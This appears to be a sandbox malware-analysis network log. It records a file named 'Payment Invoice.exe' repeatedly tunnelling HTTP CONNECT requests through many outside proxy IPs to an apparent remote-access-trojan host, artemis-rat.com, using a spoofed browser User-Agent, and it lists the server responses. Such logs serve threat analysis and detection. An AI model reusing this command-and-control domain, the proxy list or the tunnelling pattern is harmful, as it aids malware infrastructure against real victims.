                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1106192.168.2.45320878.188.81.5780807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.456312895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.278697968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.035115004 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1107192.168.2.45327613.81.217.201807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.456489086 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.278497934 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.242150068 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.090100050 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:26.771876097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:30.589426041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:34.337404013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:41.776962042 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:56.386272907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1108192.168.2.453225148.72.212.19839507076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.457115889 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.214452028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.324394941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.515142918 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.714678049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.027040958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:36.324497938 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:44.823559046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:01.620565891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1109192.168.2.453112117.160.250.16380817076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.458395958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.557507038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.385364056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.158821106 CET221INHTTP/1.1 403 Access Denied
                                                                Date: Mon, 11 Mar 2024 15:15:22 GMT
                                                                Connection: close
                                                                Cache-Control: no-store
                                                                Content-Type: text/html
                                                                Content-Language: en
                                                                Content-Length: 43
                                                                Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e
                                                                Data Ascii: You are not allowed to access the document.


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1110192.168.2.45330772.10.164.178112517076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.464633942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.153534889 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1111192.168.2.453268219.243.212.11884437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.466953993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.888654947 CET22INHTTP/1.1 502 ERROR


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1112192.168.2.45319362.72.57.240807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.472830057 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.278757095 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.480371952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:23.886445045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.538096905 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:33.276974916 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:38.011545897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:47.386220932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:06.089246988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1113192.168.2.4532985.135.83.214807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.482819080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.793554068 CET327INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1114192.168.2.453359188.114.99.37807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.487673044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.642483950 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1115192.168.2.45272698.170.57.24941457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.489306927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1116192.168.2.453187106.105.218.244807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.500838041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.935975075 CET340INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.12.2
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Content-Length: 173
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1117192.168.2.453400104.16.72.45807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.502383947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.656665087 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1118192.168.2.45331145.60.186.208274887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.502918005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1119192.168.2.453402185.162.228.170807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.504426003 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.658775091 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1120192.168.2.453318129.213.150.205807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.515822887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1121192.168.2.452763160.153.254.240485027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.518657923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.527165890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:25.527375937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:31.526998043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:43.526789904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1122192.168.2.45332223.19.244.10910807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.518657923 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1123192.168.2.453423104.27.12.22807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.521169901 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.675529003 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1124192.168.2.45332467.43.227.227251277076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:19.526170969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
